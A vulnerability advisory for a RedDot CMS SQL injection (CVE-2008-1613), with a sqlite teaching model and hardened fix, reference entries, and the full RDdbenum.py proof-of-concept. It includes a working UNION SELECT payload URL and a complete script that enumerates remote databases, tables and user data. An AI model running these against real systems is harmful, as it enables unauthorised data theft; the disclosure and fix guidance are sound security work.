RedDot CMS SQL injection vulnerability (CVE Number: CVE-2008-1613)
http://www.irmplc.com/index.php/167-Advisory-026
Vulnerability Type/Importance: SQL injection/Critical
Problem Discovered: 12 February 2008
Vendor Contacted: 19 February 2008
Advisory Published: 21 April 2008
Abstract:
The RedDot CMS Product (http://www.reddot.com) is vulnerable to a
pre-authentication SQL injection vulnerability which, when exploited,
allows enumeration of all SQL database content.
Description:
The 'LngId' Parameter passed to IoRD.asp is responsible for assigning
the language context for the CMS application. The vulnerability exists
as a result of inadequate validation of user-supplied input within this
parameter.
Technical Details:
Normal input for the 'LngId' parameter is a language code such as ENG, DEU
or JP. The value evidently selects the language-specific message table
(IO_DGC_ENG for English) and is spliced into the SQL statement without any
validation, so an attacker can complete the intended query, append a UNION
SELECT of their own and comment out whatever follows. The request is
served before any login, so no credentials are required. For example:

https://vulnerablehost.com:443/cms/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSOBJECTS where xtype=char(85) and name> '' ORDER BY 1;-- &DisableAutoLogin=1

The UNION returns the alphabetically first user table name (xtype=char(85)
is 'U', written with char() so that no quote characters are needed). SQL
Server cannot convert that string to the type of the original column, and
its error message, which begins "Conversion failed when converting the",
carries the offending value; the application returns the error text to the
client. Repeating the request with name > '<last value returned>' walks
through every table name one request at a time, and the same pattern
applied to SYSDATABASES, SYSCOLUMNS and the tables themselves enumerates
databases, columns and row data.
Proof of Concept:
A Proof of Concept (RDdbenum.py) has been developed to automate
enumeration of entire database content available from
http://www.irmplc.com/Tools/RDdbenum.py
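The extraction loop that the payload above and RDdbenum.py rely on, as an added example that is not part of the advisory or of RedDot's code. It models ioRD.asp with an in-memory sqlite3 database: the query shape (IO_DGC_<LngId>.DGC0 FROM IO_DGC_<LngId> ...), the DGC_KEY column, the sample tables and users, and the application-side simulation of SQL Server's conversion error are all assumptions, and sqlite_master plays the part of SYSOBJECTS. It also shows the two controls that close this class of bug: because LngId ends up inside a table name it cannot be bound as a parameter, so it has to be checked against an allowlist, and database errors must never be echoed to the client.

```python
"""Offline model of the ioRD.asp LngId injection and of the one-value-per-request
enumeration loop used by RDdbenum.py. Added example, not RedDot's code: sqlite3
stands in for SQL Server 2005, sqlite_master for SYSOBJECTS, and the conversion
error SQL Server raises on a mistyped UNION is simulated in the application."""
import re
import sqlite3


def build_cms_sql(lng_id):
    # Assumed shape of the CMS query (the advisory does not print it): the
    # language code is a table-name suffix, so it is concatenated, not bound.
    return ("SELECT IO_DGC_" + lng_id + ".DGC0 FROM IO_DGC_" + lng_id
            + " WHERE DGC_KEY = 'welcome'")


def build_db():
    """Constructed sample schema: per-language message tables plus a user table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE IO_DGC_ENG (DGC_KEY TEXT, DGC0 INTEGER);
        CREATE TABLE IO_DGC_DEU (DGC_KEY TEXT, DGC0 INTEGER);
        INSERT INTO IO_DGC_ENG VALUES ('welcome', 1001);
        INSERT INTO IO_DGC_DEU VALUES ('welcome', 2001);
        CREATE TABLE IO_USR (USR2 TEXT);
        INSERT INTO IO_USR VALUES ('admin'), ('editor');
    """)
    return db


def vulnerable_show_message(db, lng_id):
    """Models ioRD.asp?Action=ShowMessage: raw concatenation and a verbose error page."""
    try:
        rows = db.execute(build_cms_sql(lng_id)).fetchall()
        ids = []
        for (value,) in rows:
            if value is None:          # min() over an empty set UNIONs in a NULL row
                continue
            if not isinstance(value, int):
                # SQL Server raises this itself when a UNION forces a string into the
                # INT column position; sqlite is untyped, so it is simulated here.
                raise ValueError("Conversion failed when converting the nvarchar "
                                 "value '%s' to data type int." % value)
            ids.append(value)
        return "Message ids: %s" % ids
    except (sqlite3.Error, ValueError) as exc:
        return "Error Description %s" % exc   # the leak: DB errors reach the client


CONVERSION_ERROR = re.compile(
    r"Conversion failed when converting the nvarchar value '([^']*)' to data type int")

# Inner SELECTs for the same loop the PoC's tableenum/dataenum modes use (sqlite names).
TABLE_ENUM = "SELECT min(name) FROM sqlite_master WHERE type = 'table' AND name > '{last}'"
DATA_ENUM = "SELECT min(USR2) FROM IO_USR WHERE USR2 > '{last}'"


def injected_lng_id(select_min, last):
    """Mirrors the advisory payload: finish the CMS query, UNION in our SELECT,
    then comment out the remainder of the original statement."""
    return "ENG.DGC0 FROM IO_DGC_ENG UNION " + select_min.format(last=last) + " ORDER BY 1;-- "


def enumerate_via_error(page_for, select_min):
    """Each request leaks the smallest value above the previous one; stop when min() is NULL."""
    found, last = [], ""
    while True:
        match = CONVERSION_ERROR.search(page_for(injected_lng_id(select_min, last)))
        if not match or match.group(1) in found:
            return found
        last = match.group(1)
        found.append(last)


LANGUAGE_CODES = frozenset({"ENG", "DEU", "JP"})   # the codes the advisory lists


def hardened_show_message(db, lng_id):
    """Identifiers cannot be parameterised: allowlist LngId, bind the rest, hide errors."""
    if lng_id not in LANGUAGE_CODES:
        return "Error Description unsupported language"   # no SQL is built or run
    try:
        rows = db.execute("SELECT DGC0 FROM IO_DGC_" + lng_id + " WHERE DGC_KEY = ?",
                          ("welcome",)).fetchall()
        return "Message ids: %s" % [v for (v,) in rows]
    except sqlite3.Error:
        return "Error Description internal error"   # details belong in the server log only


if __name__ == "__main__":
    db = build_db()
    page = lambda lng: vulnerable_show_message(db, lng)
    print(enumerate_via_error(page, TABLE_ENUM))   # ['IO_DGC_DEU', 'IO_DGC_ENG', 'IO_USR']
    print(enumerate_via_error(page, DATA_ENUM))    # ['admin', 'editor']
    print(hardened_show_message(db, injected_lng_id(TABLE_ENUM, "")))
```

The loop terminates because min() over an empty set yields NULL, which the UNION accepts without a conversion error; the hardened variant rejects the payload before any SQL is assembled and, for a code that is allowed but has no table, returns a fixed message rather than the driver's error text.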
Workaround / Solutions:
There are no known workarounds for this vulnerability.
The Vendor has released a patch for this vulnerability, Release
7.5.1.86, available from normal Red Dot customer support contacts.
Tested / Affected Versions:
IRM confirmed the presence of this vulnerability in RedDot CMS version
7.5 Build 7.5.0.48, tested with Microsoft SQL Server 2005 database.
It is believed that this issue exists in RedDot CMS versions 6.5 and
7.0; however this has not been fully verified.
Credits:
Research and Advisory: Mark Crowther and Rodrigo Marcos
Disclaimer:
All information in this advisory is provided on an 'as is' basis in the
hope that it will be useful. Information Risk Management Plc is not
responsible for any risks or occurrences caused by the application of
this information.
Related entries:

NVD, CVE-2008-1613 (CWE-89; CVSS v2 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P):
SQL injection vulnerability in ioRD.asp in RedDot CMS 7.5 Build 7.5.0.48,
and possibly other versions including 6.5 and 7.0, allows remote attackers
to execute arbitrary SQL commands via the LngId parameter.
Affected products: cpe:/a:reddot:cms:6.5, cpe:/a:reddot:cms:7.0,
cpe:/a:reddot:cms:7.5

SecurityVulns: SECURITYVULNS:DOC:19708, SECURITYVULNS:VULN:8931
Packet Storm: reddot-sql.txt (PACKETSTORM:65705), RDdbenum.py.txt
(PACKETSTORM:65706)

SeeBug SSV:3215 (BUGTRAQ ID 28872), translated from Chinese:
RedDot CMS is a website content management system. RedDot CMS has an input
validation flaw that a remote attacker may exploit to carry out SQL
injection attacks. The LngId parameter passed to the IoRD.asp file of
RedDot CMS is responsible for assigning the language context of the CMS
application. Because this parameter is used in SQL statements without
proper validation, a remote attacker can bypass restrictions on database
access through SQL injection and enumerate information from the database.
RedDot CMS 7.5.1
Vendor: RedDot
The vendor has released an upgrade patch that fixes this security issue;
download it from the vendor's homepage:
http://www.reddot.com/products_web_content_management.htm

Proof of Concept script RDdbenum.py (reconstructed from the Packet Storm
copy, which had lost its indentation; Python 2):

#!/usr/bin/env python

# un-comment your selection.

import urllib2
import urllib
import string
import getopt
import sys

def banner():
    print
    print "RED DOT CMS 7.5 database enumeration"
    print "by Mark Crowther and Rodrigo Marcos"

def usage():
    print
    print "usage():"
    print "python RDdbenum.py [options] URL"
    print
    print " [options]"
    print " --dbenum: Database enumeration"
    print " --tableenum: Table enumeration, use -d to specify database"
    print " --colenum: Column enumeration, use -d to specify database and -t to specify table"
    print " --dataenum: Data enumeration, use -d to specify database, -t to specify table and -c to specify a column"
    print " -d: Specify a database"
    print " -t: Specify a table"
    print " -c: Specify a column"
    print " -h: Help page"
    print
    print "Examples: "
    print " python RDdbenum.py --dbenum http://myhost/cms/"
    print " python RDdbenum.py --tableenum -d IoAdministration http://myhost/cms/"
    print " python RDdbenum.py --colenum -d IoAdministration -t IO_USR http://myhost/cms/"
    print " python RDdbenum.py --dataenum -d IoAdministration -t IO_USR -c USR2 http://myhost/cms/"
    print
    sys.exit()

def retrievedata(url1, url2 = "' ORDER BY 1;-- &DisableAutoLogin=1"):
    # Each request leaks one value through the SQL Server conversion error
    # echoed in the page; feed it back as the lower bound for the next
    # request until the server stops returning the error.
    marker = ' Description Conversion failed when converting the '
    current = ''
    while 1:
        request = url1 + current + url2
        request = string.replace(request, ' ', '%20')
        req = urllib2.Request(request)
        try:
            r = urllib2.urlopen(req)
        except urllib2.URLError, msg:
            print "[+] Error: Error requesting URL (%s)" % msg
            return
        result = r.read()
        #print result
        pos = string.find(result, marker)
        if pos == -1:
            return
        # the leaked value is the first single-quoted string after the marker
        start = string.find(result, "'", pos) + 1
        end = string.find(result, "'", start)
        current = result[start:end]
        print current

def dbenum():
    retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYS.SYSDATABASES where name> '")

def tableenum(database=''):
    if database=='':
        retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSOBJECTS where xtype=char(85) and name> '")
    else:
        retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM " + database + "..SYSOBJECTS where xtype=char(85) and name> '")

def colenum(table, database=''):
    if table=='':
        usage()
    if database=='':
        retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSCOLUMNS where name > '", "' AND id = (SELECT id from SYSOBJECTS WHERE name= '" + table + "') ORDER BY 1;-- &DisableAutoLogin=1")
    else:
        retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM " + database + "..SYSCOLUMNS where name > '", "' AND id = (SELECT id from " + database + "..SYSOBJECTS WHERE name= '" + table + "') ORDER BY 1;-- &DisableAutoLogin=1")

def dataenum(column, table, database=''):
    if column=='' or table=='':
        usage()
    if database=='':
        retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT MIN(" + column + ") FROM " + table + " WHERE " + column + "> '")
    else:
        retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT MIN(" + column + ") FROM " + database + ".." + table + " WHERE " + column + "> '")

banner()
pdbenum = 0
ptableenum = 0
pcolenum = 0
pdataenum = 0
database = ''
table = ''
column = ''

# the target base URL is the last argument, e.g. http://myhost/cms/
url = sys.argv[len(sys.argv)-1]

try:
    opts, args = getopt.getopt(sys.argv[1:], "d:t:c:h", ["help", "dbenum", "tableenum", "colenum", "dataenum"])
except getopt.GetoptError:
    usage()

for o, a in opts:
    if o in ("-h", "--help"):
        usage()
    if o == "--dbenum":
        pdbenum = 1
    if o == "--tableenum":
        ptableenum = 1
    if o == "--colenum":
        pcolenum = 1
    if o == "--dataenum":
        pdataenum = 1
    if o == "-d":
        database = a
    if o == "-t":
        table = a
    if o == "-c":
        column = a

if pdbenum == 1:
    print 'Enumerating databases:'
    dbenum()
elif ptableenum == 1:
    print 'Enumerating tables:'
    tableenum(database)
elif pcolenum == 1:
    print 'Enumerating columns:'
    colenum(table, database)
elif pdataenum == 1:
    print 'Enumerating data:'
    dataenum(column, table, database)
else:
    usage()